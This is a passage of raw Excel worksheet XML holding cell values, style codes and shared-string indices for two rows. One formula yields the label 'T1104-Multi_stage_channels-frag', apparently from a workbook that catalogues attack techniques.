      </c>
      <c r="QO28" s="120">
        <v>0</v>
      </c>
      <c r="QP28" s="120">
        <v>0</v>
      </c>
      <c r="QQ28" s="195"/>
      <c r="QR28" s="195">
        <v>0</v>
      </c>
      <c r="QS28" s="464">
        <v>0</v>
      </c>
      <c r="QT28" s="184"/>
      <c r="QU28" s="184"/>
      <c r="QV28" s="184"/>
      <c r="QW28" s="184"/>
      <c r="QX28" s="184"/>
      <c r="QY28" s="184"/>
      <c r="QZ28" s="184"/>
      <c r="RA28" s="184"/>
      <c r="RB28" s="184"/>
      <c r="RC28" s="184"/>
      <c r="RD28" s="184"/>
      <c r="RE28" s="184"/>
      <c r="RF28" s="184"/>
      <c r="RG28" s="184"/>
      <c r="RH28" s="184"/>
      <c r="RI28" s="184"/>
      <c r="RJ28" s="184"/>
      <c r="RK28" s="184"/>
      <c r="RL28" s="184"/>
      <c r="RM28" s="184"/>
      <c r="RN28" s="184"/>
      <c r="RO28" s="184"/>
      <c r="RP28" s="184"/>
      <c r="RQ28" s="184"/>
      <c r="RR28" s="184"/>
      <c r="RS28" s="184"/>
      <c r="RT28" s="184"/>
      <c r="RU28" s="184"/>
      <c r="RV28" s="184"/>
      <c r="RW28" s="184"/>
      <c r="RX28" s="184"/>
      <c r="RY28" s="184"/>
      <c r="RZ28" s="184"/>
      <c r="SA28" s="184"/>
      <c r="SB28" s="184"/>
      <c r="SC28" s="184"/>
      <c r="SD28" s="184"/>
      <c r="SE28" s="184"/>
      <c r="SF28" s="184"/>
      <c r="SG28" s="184"/>
      <c r="SH28" s="184"/>
      <c r="SI28" s="184"/>
      <c r="SJ28" s="184"/>
      <c r="SK28" s="184"/>
      <c r="SL28" s="184"/>
      <c r="SM28" s="184"/>
      <c r="SN28" s="184"/>
      <c r="SO28" s="184"/>
      <c r="SP28" s="184"/>
      <c r="SQ28" s="184"/>
      <c r="SR28" s="184"/>
      <c r="SS28" s="184"/>
      <c r="ST28" s="184"/>
      <c r="SU28" s="184"/>
      <c r="SV28" s="184"/>
      <c r="SW28" s="184"/>
      <c r="SX28" s="184"/>
      <c r="SY28" s="184"/>
      <c r="SZ28" s="184"/>
      <c r="TA28" s="184"/>
      <c r="TB28" s="184"/>
      <c r="TC28" s="184"/>
      <c r="TD28" s="184"/>
      <c r="TE28" s="184"/>
      <c r="TF28" s="184"/>
      <c r="TG28" s="184"/>
      <c r="TH28" s="184"/>
      <c r="TI28" s="184"/>
      <c r="TJ28" s="184"/>
      <c r="TK28" s="184"/>
      <c r="TL28" s="184"/>
      <c r="TM28" s="184"/>
      <c r="TN28" s="184"/>
      <c r="TO28" s="184"/>
      <c r="TP28" s="184"/>
      <c r="TQ28" s="184"/>
      <c r="TR28" s="184"/>
      <c r="TS28" s="184"/>
      <c r="TT28" s="184"/>
      <c r="TU28" s="184"/>
      <c r="TV28" s="184"/>
      <c r="TW28" s="184"/>
      <c r="TX28" s="184"/>
      <c r="TY28" s="184"/>
      <c r="TZ28" s="184"/>
      <c r="UA28" s="184"/>
      <c r="UB28" s="184"/>
      <c r="UC28" s="184"/>
      <c r="UD28" s="184"/>
      <c r="UE28" s="184"/>
      <c r="UF28" s="184"/>
      <c r="UG28" s="184"/>
      <c r="UH28" s="184"/>
      <c r="UI28" s="184"/>
      <c r="UJ28" s="184"/>
      <c r="UK28" s="184"/>
      <c r="UL28" s="184"/>
      <c r="UM28" s="184"/>
      <c r="UN28" s="184"/>
      <c r="UO28" s="184"/>
      <c r="UP28" s="184"/>
      <c r="UQ28" s="184"/>
      <c r="UR28" s="184"/>
      <c r="US28" s="184"/>
      <c r="UT28" s="184"/>
      <c r="UU28" s="184"/>
      <c r="UV28" s="184"/>
      <c r="UW28" s="184"/>
      <c r="UX28" s="184"/>
      <c r="UY28" s="184"/>
      <c r="UZ28" s="184"/>
      <c r="VA28" s="184"/>
      <c r="VB28" s="184"/>
      <c r="VC28" s="184"/>
      <c r="VD28" s="184"/>
      <c r="VE28" s="184"/>
      <c r="VF28" s="184"/>
      <c r="VG28" s="184"/>
      <c r="VH28" s="184"/>
      <c r="VI28" s="184"/>
      <c r="VJ28" s="184"/>
      <c r="VK28" s="184"/>
      <c r="VL28" s="184"/>
      <c r="VM28" s="184"/>
      <c r="VN28" s="184"/>
      <c r="VO28" s="184"/>
      <c r="VP28" s="184"/>
      <c r="VQ28" s="184"/>
      <c r="VR28" s="184"/>
      <c r="VS28" s="184"/>
      <c r="VT28" s="184"/>
      <c r="VU28" s="184"/>
      <c r="VV28" s="184"/>
      <c r="VW28" s="184"/>
      <c r="VX28" s="184"/>
      <c r="VY28" s="184"/>
    </row>
    <row r="29" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A29" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B29" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C29" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D29" s="83" t="s">
        <v>60</v>
      </c>
      <c r="E29" s="83">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="F29" s="83" t="s">
        <v>61</v>
      </c>
      <c r="G29" s="94" t="s">
        <v>4</v>
      </c>
      <c r="H29" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I29" s="81" t="s">
        <v>1015</v>
      </c>
      <c r="J29" s="85" t="s">
        <v>4</v>
      </c>
      <c r="K29" s="81" t="s">
        <v>1016</v>
      </c>
      <c r="L29" s="81" t="s">
        <v>1017</v>
      </c>
      <c r="M29" s="378" t="s">
        <v>203</v>
      </c>
      <c r="N29" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O29" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P29" s="91"/>
      <c r="Q29" s="379" t="s">
        <v>882</v>
      </c>
      <c r="R29" s="92" t="s">
        <v>1018</v>
      </c>
      <c r="S29" s="93" t="s">
        <v>787</v>
      </c>
      <c r="T29" s="92" t="s">
        <v>1019</v>
      </c>
      <c r="U29" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V29" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W29" s="96" t="s">
        <v>1020</v>
      </c>
      <c r="X29" s="97" t="s">
        <v>1021</v>
      </c>
      <c r="Y29" s="83" t="s">
        <v>1022</v>
      </c>
      <c r="Z29" s="98" t="s">
        <v>1023</v>
      </c>
      <c r="AA29" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB29" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC29" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD29" s="83"/>
      <c r="AE29" s="83"/>
      <c r="AF29" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG29" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH29" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI29" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ29" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AK29" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL29" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM29" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN29" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO29" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP29" s="385" t="str">
        <f>M29&amp;"-frag"</f>
        <v>T1104-Multi_stage_channels-frag</v>
      </c>
      <c r="AQ29" s="358">
        <v>1</v>
      </c>
      <c r="AR29" s="100"/>
      <c r="AS29" s="100">
        <v>1</v>
      </c>
      <c r="AT29" s="100">
        <v>1</v>
      </c>
      <c r="AU29" s="100">
        <v>2</v>
      </c>
      <c r="AV29" s="92" t="s">
        <v>991</v>
      </c>
      <c r="AW29" s="100">
        <v>1</v>
      </c>
      <c r="AX29" s="100">
        <v>1</v>
      </c>
      <c r="AY29" s="100">
        <v>1</v>
      </c>
      <c r="AZ29" s="100">
        <v>2</v>
      </c>
      <c r="BA29" s="381"/>
      <c r="BB29" s="101">
        <v>0</v>
      </c>
      <c r="BC29" s="102">
        <v>0</v>
      </c>
      <c r="BD29" s="102">
        <v>0</v>
      </c>
      <c r="BE29" s="103">
        <v>0</v>
      </c>
      <c r="BF29" s="103">
        <v>0</v>
      </c>
      <c r="BG29" s="104">
        <v>0</v>
      </c>
      <c r="BH29" s="105">
        <v>3</v>
      </c>
      <c r="BI29" s="106" t="s">
        <v>1840</v>
      </c>
      <c r="BJ29" s="497">
        <v>3</v>
      </c>
      <c r="BK29" s="186" t="s">
        <v>1841</v>
      </c>
      <c r="BL29" s="107">
        <v>3</v>
      </c>
      <c r="BM29" s="108">
        <v>1</v>
      </c>
      <c r="BN29" s="109">
        <v>3</v>
      </c>
      <c r="BO29" s="110" t="s">
        <v>1840</v>
      </c>
      <c r="BP29" s="501">
        <v>3</v>
      </c>
      <c r="BQ29" s="187" t="s">
        <v>1841</v>
      </c>
      <c r="BR29" s="111">
        <v>3</v>
      </c>
      <c r="BS29" s="112">
        <v>1</v>
      </c>
      <c r="BT29" s="113">
        <v>19</v>
      </c>
      <c r="BU29" s="114" t="s">
        <v>1893</v>
      </c>
      <c r="BV29" s="503">
        <v>1</v>
      </c>
      <c r="BW29" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="BX29" s="115">
        <v>1</v>
      </c>
      <c r="BY29" s="116">
        <v>1</v>
      </c>
      <c r="BZ29" s="250">
        <v>7</v>
      </c>
      <c r="CA29" s="251" t="s">
        <v>2568</v>
      </c>
      <c r="CB29" s="505">
        <v>5</v>
      </c>
      <c r="CC29" s="254" t="s">
        <v>2569</v>
      </c>
      <c r="CD29" s="252">
        <v>5</v>
      </c>
      <c r="CE29" s="253">
        <v>1</v>
      </c>
      <c r="CF29" s="101">
        <v>26</v>
      </c>
      <c r="CG29" s="102" t="s">
        <v>2088</v>
      </c>
      <c r="CH29" s="102">
        <v>6</v>
      </c>
      <c r="CI29" s="103" t="s">
        <v>2089</v>
      </c>
      <c r="CJ29" s="103">
        <v>6</v>
      </c>
      <c r="CK29" s="104">
        <v>1</v>
      </c>
      <c r="CL29" s="105">
        <v>0</v>
      </c>
      <c r="CM29" s="106">
        <v>0</v>
      </c>
      <c r="CN29" s="497">
        <v>0</v>
      </c>
      <c r="CO29" s="186">
        <v>0</v>
      </c>
      <c r="CP29" s="107">
        <v>0</v>
      </c>
      <c r="CQ29" s="108">
        <v>0</v>
      </c>
      <c r="CR29" s="109">
        <v>0</v>
      </c>
      <c r="CS29" s="110">
        <v>0</v>
      </c>
      <c r="CT29" s="501">
        <v>0</v>
      </c>
      <c r="CU29" s="187">
        <v>0</v>
      </c>
      <c r="CV29" s="111">
        <v>0</v>
      </c>
      <c r="CW29" s="112">
        <v>0</v>
      </c>
      <c r="CX29" s="113">
        <v>3</v>
      </c>
      <c r="CY29" s="114" t="s">
        <v>1840</v>
      </c>
      <c r="CZ29" s="503">
        <v>3</v>
      </c>
      <c r="DA29" s="115" t="s">
        <v>1841</v>
      </c>
      <c r="DB29" s="115">
        <v>3</v>
      </c>
      <c r="DC29" s="116">
        <v>1</v>
      </c>
      <c r="DD29" s="101">
        <v>0</v>
      </c>
      <c r="DE29" s="102">
        <v>0</v>
      </c>
      <c r="DF29" s="102">
        <v>0</v>
      </c>
      <c r="DG29" s="103">
        <v>0</v>
      </c>
      <c r="DH29" s="103">
        <v>0</v>
      </c>
      <c r="DI29" s="104">
        <v>0</v>
      </c>
      <c r="DJ29" s="105">
        <v>3</v>
      </c>
      <c r="DK29" s="106" t="s">
        <v>1840</v>
      </c>
      <c r="DL29" s="497">
        <v>3</v>
      </c>
      <c r="DM29" s="186" t="s">
        <v>1841</v>
      </c>
      <c r="DN29" s="107">
        <v>3</v>
      </c>
      <c r="DO29" s="108">
        <v>1</v>
      </c>
      <c r="DP29" s="109">
        <v>3</v>
      </c>
      <c r="DQ29" s="110" t="s">
        <v>1840</v>
      </c>
      <c r="DR29" s="501">
        <v>3</v>
      </c>
      <c r="DS29" s="187" t="s">
        <v>1841</v>
      </c>
      <c r="DT29" s="111">
        <v>3</v>
      </c>
      <c r="DU29" s="112">
        <v>1</v>
      </c>
      <c r="DV29" s="113">
        <v>19</v>
      </c>
      <c r="DW29" s="114" t="s">
        <v>1893</v>
      </c>
      <c r="DX29" s="503">
        <v>1</v>
      </c>
      <c r="DY29" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ29" s="115">
        <v>1</v>
      </c>
      <c r="EA29" s="116">
        <v>1</v>
      </c>
      <c r="EB29" s="250">
        <v>3</v>
      </c>
      <c r="EC29" s="251" t="s">
        <v>1840</v>
      </c>
      <c r="ED29" s="505">
        <v>3</v>
      </c>
      <c r="EE29" s="254" t="s">
        <v>1841</v>
      </c>
      <c r="EF29" s="252">
        <v>3</v>
      </c>
      <c r="EG29" s="253">
        <v>1</v>
      </c>
      <c r="EH29" s="101">
        <v>22</v>
      </c>
      <c r="EI29" s="102" t="s">
        <v>2964</v>
      </c>
      <c r="EJ29" s="102">
        <v>4</v>
      </c>
      <c r="EK29" s="103" t="s">
        <v>2574</v>
      </c>
      <c r="EL29" s="103">
        <v>4</v>
      </c>
      <c r="EM29" s="104">
        <v>1</v>
      </c>
      <c r="EN29" s="105">
        <v>0</v>
      </c>
      <c r="EO29" s="106">
        <v>0</v>
      </c>
      <c r="EP29" s="497">
        <v>0</v>
      </c>
      <c r="EQ29" s="186">
        <v>0</v>
      </c>
      <c r="ER29" s="107">
        <v>0</v>
      </c>
      <c r="ES29" s="108">
        <v>0</v>
      </c>
      <c r="ET29" s="109">
        <v>0</v>
      </c>
      <c r="EU29" s="110">
        <v>0</v>
      </c>
      <c r="EV29" s="501">
        <v>0</v>
      </c>
      <c r="EW29" s="187">
        <v>0</v>
      </c>
      <c r="EX29" s="111">
        <v>0</v>
      </c>
      <c r="EY29" s="112">
        <v>0</v>
      </c>
      <c r="EZ29" s="113">
        <v>3</v>
      </c>
      <c r="FA29" s="114" t="s">
        <v>1840</v>
      </c>
      <c r="FB29" s="503">
        <v>3</v>
      </c>
      <c r="FC29" s="115" t="s">
        <v>1841</v>
      </c>
      <c r="FD29" s="115">
        <v>3</v>
      </c>
      <c r="FE29" s="116">
        <v>1</v>
      </c>
      <c r="FF29" s="101">
        <v>0</v>
      </c>
      <c r="FG29" s="102">
        <v>0</v>
      </c>
      <c r="FH29" s="102">
        <v>0</v>
      </c>
      <c r="FI29" s="103">
        <v>0</v>
      </c>
      <c r="FJ29" s="103">
        <v>0</v>
      </c>
      <c r="FK29" s="104">
        <v>0</v>
      </c>
      <c r="FL29" s="105">
        <v>0</v>
      </c>
      <c r="FM29" s="106">
        <v>0</v>
      </c>
      <c r="FN29" s="497">
        <v>0</v>
      </c>
      <c r="FO29" s="186">
        <v>0</v>
      </c>
      <c r="FP29" s="107">
        <v>0</v>
      </c>
      <c r="FQ29" s="108">
        <v>0</v>
      </c>
      <c r="FR29" s="109">
        <v>0</v>
      </c>
      <c r="FS29" s="110">
        <v>0</v>
      </c>
      <c r="FT29" s="501">
        <v>0</v>
      </c>
      <c r="FU29" s="187">
        <v>0</v>
      </c>
      <c r="FV29" s="111">
        <v>0</v>
      </c>
      <c r="FW29" s="112">
        <v>0</v>
      </c>
      <c r="FX29" s="113">
        <v>0</v>
      </c>
      <c r="FY29" s="114">
        <v>0</v>
      </c>
      <c r="FZ29" s="503">
        <v>0</v>
      </c>
      <c r="GA29" s="115">
        <v>0</v>
      </c>
      <c r="GB29" s="115">
        <v>0</v>
      </c>
      <c r="GC29" s="116">
        <v>0</v>
      </c>
      <c r="GD29" s="250">
        <v>4</v>
      </c>
      <c r="GE29" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF29" s="505">
        <v>2</v>
      </c>
      <c r="GG29" s="254" t="s">
        <v>1903</v>
      </c>
      <c r="GH29" s="252">
        <v>2</v>
      </c>
      <c r="GI29" s="253">
        <v>1</v>
      </c>
      <c r="GJ29" s="101">
        <v>4</v>
      </c>
      <c r="GK29" s="102" t="s">
        <v>1902</v>
      </c>
      <c r="GL29" s="102">
        <v>2</v>
      </c>
      <c r="GM29" s="103" t="s">
        <v>1903</v>
      </c>
      <c r="GN29" s="103">
        <v>2</v>
      </c>
      <c r="GO29" s="104">
        <v>1</v>
      </c>
      <c r="GP29" s="105">
        <v>0</v>
      </c>
      <c r="GQ29" s="106">
        <v>0</v>
      </c>
      <c r="GR29" s="497">
        <v>0</v>
      </c>
      <c r="GS29" s="186">
        <v>0</v>
      </c>
      <c r="GT29" s="107">
        <v>0</v>
      </c>
      <c r="GU29" s="108">
        <v>0</v>
      </c>
      <c r="GV29" s="109">
        <v>0</v>
      </c>
      <c r="GW29" s="110">
        <v>0</v>
      </c>
      <c r="GX29" s="501">
        <v>0</v>
      </c>
      <c r="GY29" s="187">
        <v>0</v>
      </c>
      <c r="GZ29" s="111">
        <v>0</v>
      </c>
      <c r="HA29" s="112">
        <v>0</v>
      </c>
      <c r="HB29" s="113">
        <v>0</v>
      </c>
      <c r="HC29" s="114">
        <v>0</v>
      </c>
      <c r="HD29" s="503">
        <v>0</v>
      </c>
      <c r="HE29" s="115">
        <v>0</v>
      </c>
      <c r="HF29" s="115">
        <v>0</v>
      </c>
      <c r="HG29" s="116">
        <v>0</v>
      </c>
      <c r="HH29" s="101">
        <v>0</v>
      </c>
      <c r="HI29" s="102">
        <v>0</v>
      </c>
      <c r="HJ29" s="102">
        <v>0</v>
      </c>
      <c r="HK29" s="103">
        <v>0</v>
      </c>
      <c r="HL29" s="103">
        <v>0</v>
      </c>
      <c r="HM29" s="104">
        <v>0</v>
      </c>
      <c r="HN29" s="105">
        <v>0</v>
      </c>
      <c r="HO29" s="106">
        <v>0</v>
      </c>
      <c r="HP29" s="497">
        <v>0</v>
      </c>
      <c r="HQ29" s="186">
        <v>0</v>
      </c>
      <c r="HR29" s="107">
        <v>0</v>
      </c>
      <c r="HS29" s="108">
        <v>0</v>
      </c>
      <c r="HT29" s="109">
        <v>0</v>
      </c>
      <c r="HU29" s="110">
        <v>0</v>
      </c>
      <c r="HV29" s="501">
        <v>0</v>
      </c>
      <c r="HW29" s="187">
        <v>0</v>
      </c>
      <c r="HX29" s="111">
        <v>0</v>
      </c>
      <c r="HY29" s="112">
        <v>0</v>
      </c>
      <c r="HZ29" s="113">
        <v>0</v>
      </c>
      <c r="IA29" s="114">
        <v>0</v>
      </c>
      <c r="IB29" s="503">
        <v>0</v>
      </c>
      <c r="IC29" s="115">
        <v>0</v>
      </c>
      <c r="ID29" s="115">
        <v>0</v>
      </c>
      <c r="IE29" s="116">
        <v>0</v>
      </c>
      <c r="IF29" s="250">
        <v>0</v>
      </c>
      <c r="IG29" s="251">
        <v>0</v>
      </c>
      <c r="IH29" s="505">
        <v>0</v>
      </c>
      <c r="II29" s="254">
        <v>0</v>
      </c>
      <c r="IJ29" s="252">
        <v>0</v>
      </c>
      <c r="IK29" s="253">
        <v>0</v>
      </c>
      <c r="IL29" s="101">
        <v>0</v>
      </c>
      <c r="IM29" s="102">
        <v>0</v>
      </c>
      <c r="IN29" s="102">
        <v>0</v>
      </c>
      <c r="IO29" s="103">
        <v>0</v>
      </c>
      <c r="IP29" s="103">
        <v>0</v>
      </c>
      <c r="IQ29" s="104">
        <v>0</v>
      </c>
      <c r="IR29" s="105">
        <v>0</v>
      </c>
      <c r="IS29" s="106">
        <v>0</v>
      </c>
      <c r="IT29" s="497">
        <v>0</v>
      </c>
      <c r="IU29" s="186">
        <v>0</v>
      </c>
      <c r="IV29" s="107">
        <v>0</v>
      </c>
      <c r="IW29" s="108">
        <v>0</v>
      </c>
      <c r="IX29" s="109">
        <v>0</v>
      </c>
      <c r="IY29" s="110">
        <v>0</v>
      </c>
      <c r="IZ29" s="501">
        <v>0</v>
      </c>
      <c r="JA29" s="187">
        <v>0</v>
      </c>
      <c r="JB29" s="111">
        <v>0</v>
      </c>
      <c r="JC29" s="112">
        <v>0</v>
      </c>
      <c r="JD29" s="113">
        <v>0</v>
      </c>
      <c r="JE29" s="114">
        <v>0</v>
      </c>
      <c r="JF29" s="503">
        <v>0</v>
      </c>
      <c r="JG29" s="115">
        <v>0</v>
      </c>
      <c r="JH29" s="115">
        <v>0</v>
      </c>
      <c r="JI29" s="116">
        <v>0</v>
      </c>
      <c r="JJ29" s="101">
        <v>0</v>
      </c>
      <c r="JK29" s="102">
        <v>0</v>
      </c>
      <c r="JL29" s="102">
        <v>0</v>
      </c>
      <c r="JM29" s="103">
        <v>0</v>
      </c>
      <c r="JN29" s="103">
        <v>0</v>
      </c>
      <c r="JO29" s="104">
        <v>0</v>
      </c>
      <c r="JP29" s="105">
        <v>0</v>
      </c>
      <c r="JQ29" s="106">
        <v>0</v>
      </c>
      <c r="JR29" s="497">
        <v>0</v>
      </c>
      <c r="JS29" s="186">
        <v>0</v>
      </c>
      <c r="JT29" s="107">
        <v>0</v>
      </c>
      <c r="JU29" s="108">
        <v>0</v>
      </c>
      <c r="JV29" s="109">
        <v>0</v>
      </c>
      <c r="JW29" s="110">
        <v>0</v>
      </c>
      <c r="JX29" s="501">
        <v>0</v>
      </c>
      <c r="JY29" s="187">
        <v>0</v>
      </c>
      <c r="JZ29" s="111">
        <v>0</v>
      </c>
      <c r="KA29" s="112">
        <v>0</v>
      </c>
      <c r="KB29" s="113">
        <v>0</v>
      </c>
      <c r="KC29" s="114">
        <v>0</v>
      </c>
      <c r="KD29" s="503">
        <v>0</v>
      </c>
      <c r="KE29" s="115">
        <v>0</v>
      </c>
      <c r="KF29" s="115">
        <v>0</v>
      </c>
      <c r="KG29" s="116">
        <v>0</v>
      </c>
      <c r="KH29" s="250">
        <v>0</v>
      </c>
      <c r="KI29" s="251">
        <v>0</v>
      </c>
      <c r="KJ29" s="505">
        <v>0</v>
      </c>
      <c r="KK29" s="254">
        <v>0</v>
      </c>
      <c r="KL29" s="252">
        <v>0</v>
      </c>
      <c r="KM29" s="253">
        <v>0</v>
      </c>
      <c r="KN29" s="101">
        <v>0</v>
      </c>
      <c r="KO29" s="102">
        <v>0</v>
      </c>
      <c r="KP29" s="102">
        <v>0</v>
      </c>
      <c r="KQ29" s="103">
        <v>0</v>
      </c>
      <c r="KR29" s="103">
        <v>0</v>
      </c>
      <c r="KS29" s="104">
        <v>0</v>
      </c>
      <c r="KT29" s="105">
        <v>0</v>
      </c>
      <c r="KU29" s="106">
        <v>0</v>
      </c>
      <c r="KV29" s="497">
        <v>0</v>
      </c>
      <c r="KW29" s="186">
        <v>0</v>
      </c>
      <c r="KX29" s="107">
        <v>0</v>
      </c>
      <c r="KY29" s="108">
        <v>0</v>
      </c>
      <c r="KZ29" s="109">
        <v>0</v>
      </c>
      <c r="LA29" s="110">
        <v>0</v>
      </c>
      <c r="LB29" s="501">
        <v>0</v>
      </c>
      <c r="LC29" s="187">
        <v>0</v>
      </c>
      <c r="LD29" s="111">
        <v>0</v>
      </c>
      <c r="LE29" s="112">
        <v>0</v>
      </c>
      <c r="LF29" s="113">
        <v>0</v>
      </c>
      <c r="LG29" s="114">
        <v>0</v>
      </c>
      <c r="LH29" s="503">
        <v>0</v>
      </c>
      <c r="LI29" s="115">
        <v>0</v>
      </c>
      <c r="LJ29" s="115">
        <v>0</v>
      </c>
      <c r="LK29" s="116">
        <v>0</v>
      </c>
      <c r="LL29" s="117">
        <v>4</v>
      </c>
      <c r="LM29" s="507">
        <v>3</v>
      </c>
      <c r="LN29" s="119">
        <v>2</v>
      </c>
      <c r="LO29" s="119">
        <v>1</v>
      </c>
      <c r="LP29" s="119">
        <v>1</v>
      </c>
      <c r="LQ29" s="119">
        <v>1</v>
      </c>
      <c r="LR29" s="119">
        <v>1</v>
      </c>
      <c r="LS29" s="119">
        <v>1</v>
      </c>
      <c r="LT29" s="382"/>
      <c r="LU29" s="117">
        <v>1</v>
      </c>
      <c r="LV29" s="118" t="s">
        <v>4160</v>
      </c>
      <c r="LW29" s="507">
        <v>1</v>
      </c>
      <c r="LX29" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY29" s="119">
        <v>1</v>
      </c>
      <c r="LZ29" s="119">
        <v>1</v>
      </c>
      <c r="MA29" s="117">
        <v>0</v>
      </c>
      <c r="MB29" s="118">
        <v>0</v>
      </c>
      <c r="MC29" s="507">
        <v>0</v>
      </c>
      <c r="MD29" s="119">
        <v>0</v>
      </c>
      <c r="ME29" s="119">
        <v>0</v>
      </c>
      <c r="MF29" s="119">
        <v>0</v>
      </c>
      <c r="MG29" s="117">
        <v>0</v>
      </c>
      <c r="MH29" s="118">
        <v>0</v>
      </c>
      <c r="MI29" s="507">
        <v>0</v>
      </c>
      <c r="MJ29" s="119">
        <v>0</v>
      </c>
      <c r="MK29" s="119">
        <v>0</v>
      </c>
      <c r="ML29" s="119">
        <v>0</v>
      </c>
      <c r="MM29" s="117">
        <v>2</v>
      </c>
      <c r="MN29" s="118" t="s">
        <v>4193</v>
      </c>
      <c r="MO29" s="507">
        <v>1</v>
      </c>
      <c r="MP29" s="119" t="s">
        <v>2537</v>
      </c>
      <c r="MQ29" s="119">
        <v>1</v>
      </c>
      <c r="MR29" s="119">
        <v>1</v>
      </c>
      <c r="MS29" s="117">
        <v>0</v>
      </c>
      <c r="MT29" s="118">
        <v>0</v>
      </c>
      <c r="MU29" s="507">
        <v>0</v>
      </c>
      <c r="MV29" s="119">
        <v>0</v>
      </c>
      <c r="MW29" s="119">
        <v>0</v>
      </c>
      <c r="MX29" s="119">
        <v>0</v>
      </c>
      <c r="MY29" s="117">
        <v>0</v>
      </c>
      <c r="MZ29" s="118">
        <v>0</v>
      </c>
      <c r="NA29" s="507">
        <v>0</v>
      </c>
      <c r="NB29" s="119">
        <v>0</v>
      </c>
      <c r="NC29" s="119">
        <v>0</v>
      </c>
      <c r="ND29" s="119">
        <v>0</v>
      </c>
      <c r="NE29" s="117">
        <v>0</v>
      </c>
      <c r="NF29" s="118">
        <v>0</v>
      </c>
      <c r="NG29" s="507">
        <v>0</v>
      </c>
      <c r="NH29" s="119">
        <v>0</v>
      </c>
      <c r="NI29" s="119">
        <v>0</v>
      </c>
      <c r="NJ29" s="119">
        <v>0</v>
      </c>
      <c r="NK29" s="117">
        <v>0</v>
      </c>
      <c r="NL29" s="118">
        <v>0</v>
      </c>
      <c r="NM29" s="507">
        <v>0</v>
      </c>
      <c r="NN29" s="119">
        <v>0</v>
      </c>
      <c r="NO29" s="119">
        <v>0</v>
      </c>
      <c r="NP29" s="119">
        <v>0</v>
      </c>
      <c r="NQ29" s="117">
        <v>0</v>
      </c>
      <c r="NR29" s="118">
        <v>0</v>
      </c>
      <c r="NS29" s="507">
        <v>0</v>
      </c>
      <c r="NT29" s="119">
        <v>0</v>
      </c>
      <c r="NU29" s="119">
        <v>0</v>
      </c>
      <c r="NV29" s="119">
        <v>0</v>
      </c>
      <c r="NW29" s="117">
        <v>1</v>
      </c>
      <c r="NX29" s="118" t="s">
        <v>4339</v>
      </c>
      <c r="NY29" s="507">
        <v>1</v>
      </c>
      <c r="NZ29" s="119" t="s">
        <v>2965</v>
      </c>
      <c r="OA29" s="119">
        <v>1</v>
      </c>
      <c r="OB29" s="119">
        <v>1</v>
      </c>
      <c r="OC29" s="120">
        <v>5</v>
      </c>
      <c r="OD29" s="120">
        <v>2</v>
      </c>
      <c r="OE29" s="120">
        <v>2</v>
      </c>
      <c r="OF29" s="121">
        <v>1</v>
      </c>
      <c r="OG29" s="120">
        <v>1</v>
      </c>
      <c r="OH29" s="120">
        <v>1</v>
      </c>
      <c r="OI29" s="120">
        <v>1</v>
      </c>
      <c r="OJ29" s="120">
        <v>1</v>
      </c>
      <c r="OK29" s="383"/>
      <c r="OL29" s="120">
        <v>4</v>
      </c>
      <c r="OM29" s="120">
        <v>4</v>
      </c>
      <c r="ON29" s="120">
        <v>1</v>
      </c>
      <c r="OO29" s="193" t="s">
        <v>2844</v>
      </c>
      <c r="OP29" s="193">
        <v>1</v>
      </c>
      <c r="OQ29" s="464">
        <v>1</v>
      </c>
      <c r="OR29" s="120">
        <v>0</v>
      </c>
      <c r="OS29" s="120">
        <v>0</v>
      </c>
      <c r="OT29" s="120">
        <v>0</v>
      </c>
      <c r="OU29" s="193"/>
      <c r="OV29" s="193">
        <v>0</v>
      </c>
      <c r="OW29" s="464">
        <v>0</v>
      </c>
      <c r="OX29" s="120">
        <v>0</v>
      </c>
      <c r="OY29" s="120">
        <v>0</v>
      </c>
      <c r="OZ29" s="120">
        <v>0</v>
      </c>
      <c r="PA29" s="193"/>
      <c r="PB29" s="193">
        <v>0</v>
      </c>
      <c r="PC29" s="464">
        <v>0</v>
      </c>
      <c r="PD29" s="120">
        <v>0</v>
      </c>
      <c r="PE29" s="120">
        <v>0</v>
      </c>
      <c r="PF29" s="120">
        <v>0</v>
      </c>
      <c r="PG29" s="193"/>
      <c r="PH29" s="193">
        <v>0</v>
      </c>
      <c r="PI29" s="464">
        <v>0</v>
      </c>
      <c r="PJ29" s="120">
        <v>1</v>
      </c>
      <c r="PK29" s="120">
        <v>1</v>
      </c>
      <c r="PL29" s="120">
        <v>1</v>
      </c>
      <c r="PM29" s="193" t="s">
        <v>2540</v>
      </c>
      <c r="PN29" s="193">
        <v>1</v>
      </c>
      <c r="PO29" s="464">
        <v>1</v>
      </c>
      <c r="PP29" s="120">
        <v>0</v>
      </c>
      <c r="PQ29" s="120">
        <v>0</v>
      </c>
      <c r="PR29" s="120">
        <v>0</v>
      </c>
      <c r="PS29" s="193"/>
      <c r="PT29" s="193">
        <v>0</v>
      </c>
      <c r="PU29" s="464">
        <v>0</v>
      </c>
      <c r="PV29" s="120">
        <v>0</v>
      </c>
      <c r="PW29" s="120">
        <v>0</v>
      </c>
      <c r="PX29" s="120">
        <v>0</v>
      </c>
